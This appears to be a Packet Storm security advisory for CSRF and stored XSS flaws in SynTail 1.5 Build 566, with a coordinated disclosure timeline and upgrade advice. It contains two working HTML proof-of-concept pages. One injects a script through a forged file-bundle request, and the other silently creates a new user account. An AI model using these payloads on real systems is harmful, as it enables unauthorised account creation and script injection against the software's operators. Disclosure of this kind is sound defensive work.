SynTail 1.5 Build 566 CSRF / Cross Site Scripting

2015-05-08T00:00:00
ID PACKETSTORM:131841
Type packetstorm
Reporter Marlow Tannhauser
Modified 2015-05-08T00:00:00

Description

                                        
                                            `# Exploit Title: Multiple vulnerabilities in SynTail 1.5 Build 566 (CSRF/Stored XSS)  
# Date: 07-05-2015  
# Exploit Author: Marlow Tannhauser  
# Contact: marlowtannhauser@gmail.com  
# Vendor Homepage: http://www.synametrics.com  
# Software Link: http://web.synametrics.com/SynTailDownload.htm  
# Version: 1.5 Build 566. Earlier versions may also be affected.  
# CVE: 2015-3140  
# Category: Web apps  
  
  
# DISCLOSURE TIMELINE #  
08/02/2015: Initial disclosure to vendor and CERT  
09/02/2015: Acknowledgment of vulnerabilities from vendor  
11/02/2015: Disclosure deadline of 01/03/2015 agreed with vendor  
19/02/2015: Disclosure deadline renegotiated to 01/04/2015 at vendor's request  
09/04/2015: Disclosure deadline renegotiated to 20/04/2015 at vendor's request  
20/04/2015: Confirmation of fix from vendor  
07/05/2015: Disclosure  
  
Note that the CVE-ID is for the CSRF vulnerability only. No CVE-ID has been generated for the stored XSS vulnerabilities. The vulnerable version of the product is no longer available for download from the vendor's webpage.  
  
  
# EXPLOIT DESCRIPTION #  
SynTail 1.5 Build 566 is vulnerable to CSRF attacks, which can also be combined with stored XSS attacks (authenticated administrators only). The JSESSIONID created when a user logs on to the system is persistent and does not change across requests.  
  
  
# POC 1 #  
The following PoC uses the CSRF vulnerability to create a new file bundle, and combines it with one of the stored XSS vulnerabilities  
  
<html>  
<body>  
<form name="evilform" method="post" action="http://192.168.0.8:9555/app">  
<input type="hidden" name="friendlyName" value="<script>alert("Marlow")</script> />  
<input type="hidden" name="selectedPath" value="/home/" />  
<input type="hidden" name="showFiles" value="true" />  
<input type="hidden" name="st" value="addfb" />  
<input type="hidden" name="operation" value="mngFB" />  
</form>  
<script type="text/javascript">  
document.evilform.submit();  
</script>  
</body>  
</html>   
  
  
# POC 2 #  
The following PoC uses the CSRF vulnerability to create a new user with the details shown  
  
<html>  
<body>  
<form name="evilform" method="post" action="http://192.168.1.245:9555/app?operation=mngUsers">  
<input type="hidden" name="fullName" value="marlow" />  
<input type="hidden" name="email" value="marlow@marlow.com" />  
<input type="hidden" name="password" value="marlow" />  
<input type="hidden" name="showFiles" value="true" />  
<input type="hidden" name="st" value="addfb" />  
<input type="hidden" name="operation" value="mngUsers" />  
</form>  
<script type="text/javascript">  
document.evilform.submit();  
</script>  
</body>  
</html>   
  
  
# STORED XSS VULNERABILITIES #  
Stored XSS vulnerabilities are present in the following fields:  
  
Manage Users > Create a new user > Full name field and Email field  
Example URL: POST request  
  
Manage file bundles > Create a new file bundle > Friendly name field and File path field  
Example URL: POST request  
  
  
# MITIGATION #  
Upgrade to the latest build of SynTail, available from the link shown.  
  
`